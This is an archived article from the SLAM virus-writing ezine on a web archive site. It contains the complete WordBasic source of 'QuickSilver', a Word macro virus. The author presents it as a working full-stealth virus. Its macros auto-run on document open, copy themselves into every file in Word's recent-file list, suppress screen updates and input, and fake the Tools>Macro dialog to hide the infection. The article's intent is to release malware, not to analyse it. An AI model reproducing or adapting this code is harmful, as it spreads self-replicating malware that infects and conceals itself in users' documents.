Neperos
SIGN IN
Copy Link
Add to Bookmark
Report

SLAM2.030: Full-Stealth WordMacro Virus QuickSilver by NJ [SLAM]

eZine's profile picture
eZine lover (@eZine)
Published in 
Slam
 · 2 years ago

[ WordMacro. QuickSilver ]-------------- 

˛ VIRUSNAME:      QuickSilver 
˛ SIZE:           1032 Bytes 
˛ ORIGIN:         Germany 
˛ AUTHOR:         Nightmare Joker 

->Polymorf        No 
->Stealth         Yes 
->Encrypted       Yes 
->Retro           No 
-----------------------------------------


Here is it! My new full-stealth macro virus QuickSilver.

If the virus become active, it search's the name of the actually ToolsMacro menu, and infect then all files in the FileList.
If someone try to look in the ToolsMacro Box to see if he maybe infected with a virus, then will QuickSilver immediately open a new document to hide his macros. The user will see NOTHING!
Btw, it works with every Word Version. 

------------------------------------------------------------------------- 

MACRO: AutoOpen 
~~~~~~~~~~~~~~~ 
Sub MAIN 

REM Set ScreenUpdating Off and DisableInput On 
ScreenUpdating : DisableInput 

REM  s1$ = e.g. "&Tools" (english version of word) 
s1$ = MenuText$(0, 6) 

REM and s2$ = e.g. "&Macro..." (english version of word) 
s2$ = MenuItemText$(s1$, 0, 13) 

REM Remove now some characters, which we don't need. ("&" and ".") 
s3$ = s1$ + s2$ 
For i = 1 To Len(s3$) 
s4$ = Mid$(s3$, i, 1) 
If s4$ <> "&" And s4$ <> "." Then 
s5$ = s5$ + s4$ 
End If 
Next i 

REM Use now the right name and save it! 
s6$ = GetDocumentVar$("Steahlt") 
If s5$ = s6$ Then Goto Continue 
ToolsMacro .Name = s6$, .Show = 3, .NewName = s5$, .Rename 
SetDocumentVar "Steahlt", s5$ 

REM Start the Quicksilver macro, 
REM set ScreenUpdating On and DisableInput Off. 
Continue: 
QuickSilver 
ScreenUpdating : DisableInput 0 
End Sub 

------------------------------------------------------------------------- 

MACRO: QuickSilver 
~~~~~~~~~~~~~~~~~~ 
Sub MAIN 

REM Set DisableAutoMacros On 
DisableAutoMacros 

REM Open now every file in the file list 
REM and check if it's allready infected. 
Steahlt$ = GetDocumentVar$("Steahlt") 
Quick$ = FileName$() 
For x = 1 To CountFiles() 
If Files$(FileName$(x)) <> "" Then 
FileList x 
Silver$ = FileName$() 
If Quick$ <> Silver$ Then 
Check$ = GetDocumentVar$("RAVE") 
If Check$ = "" Then 

REM If the active file isn't allready infected then 
REM save it as a template and copy the virus macros 
REM to it! 
FileSaveAs .Format = 1 
MacroCopy Quick$ + ":AutoOpen", Silver$ + ":", 1 
MacroCopy Quick$ + ":QuickSilver", Silver$ + ":", 1 
MacroCopy Quick$ + ":" + Steahlt$, Silver$ + ":", 1 

REM Save the name of the >> Steahlt Box <<, too. 
SetDocumentVar "RAVE", Str$(Rnd()) 
SetDocumentVar "Steahlt", Steahlt$ 
End If 

REM At last save and close the file. 
FileClose 1 
End If 
End If 
Next x 

REM Set DisableAutoMacros Off 
DisableAutoMacros 0 
REM ####################################### 
REM ############ QUICKSILVER ############## 
REM ################ BY ################### 
REM ########## NIGHTMARE JOKER ############ 
REM ############## (SLAM) ################# 
REM ####################################### 
End Sub 

------------------------------------------------------------------------- 

MACRO: >> Steahlt Box << 
~~~~~~~~~~~~~~~~~~~~~~~~ 
Sub MAIN 

REM Set ErrorHandler 
On Error Resume Next 

REM Set ScreenUpdating Off 
ScreenUpdating 

REM Create a new file to hide the infected document. 
FileNew 

REM Create the Box! 
Dim dlg As ToolsMacro 
GetCurValues dlg 
Dialog dlg 

REM Close the empty file. 
FileClose 2 

REM Set ScreenUpdating On 
ScreenUpdating 

REM And now show the user the >> clean << Box! :) 
ToolsMacro dlg 
End Sub 

REM BTW, this full-stealth method works only with Direct Action macro 
REM viruses! If you want infect the global file normal.dot too then use 
REM Virtual Boy's full-stealth routine! :) 

-------------------------------------------------------------------------


- Nightmare Joker -

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

guest's profile picture
@guest
21 Nov 2024
I can't believe you archived it! Chronicles of Chaos was my favorite online magazine back in the day.
lostcivilizations's profile picture
Lost Civilizations (@lostcivilizations)
21 Nov 2024
Thank you very much for your comment. I haven’t read the book by Hakan Öniz and didn’t know the Shardana could have traveled so far as to re ...
guest's profile picture
@guest
20 Nov 2024
Shardana or Sheridan are the sea peoples who arrive in Eire or Ireland and also move into Scotland
Adelaide's profile picture
@Adelaide
20 Nov 2024
È buono
guest's profile picture
@guest
20 Nov 2024
TODAY IT-S FREEZING. UNFORTUNATELY I NEED TO GO TO THE OFFICE! WHAT ABOUT YOU?
guest's profile picture
@guest
19 Nov 2024
reading Birmingham I thought that it was the city in UK :D
guest's profile picture
@guest
19 Nov 2024
are they made all year or typical of a special occasion?
guest's profile picture
@guest
19 Nov 2024
Deliziosa!!!!!Assolutamente da provare questa domenica! Grazie per l'idea :D
guest's profile picture
@guest
19 Nov 2024
deve essere molto dolce, zucchero piu' lo zuccherino della frutta
guest's profile picture
@guest
19 Nov 2024
tomorrow here it would be -2
a Francesco Arca production 2016 - 2024
Terms of Service - Privacy Policy
neperos on mastodon
Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT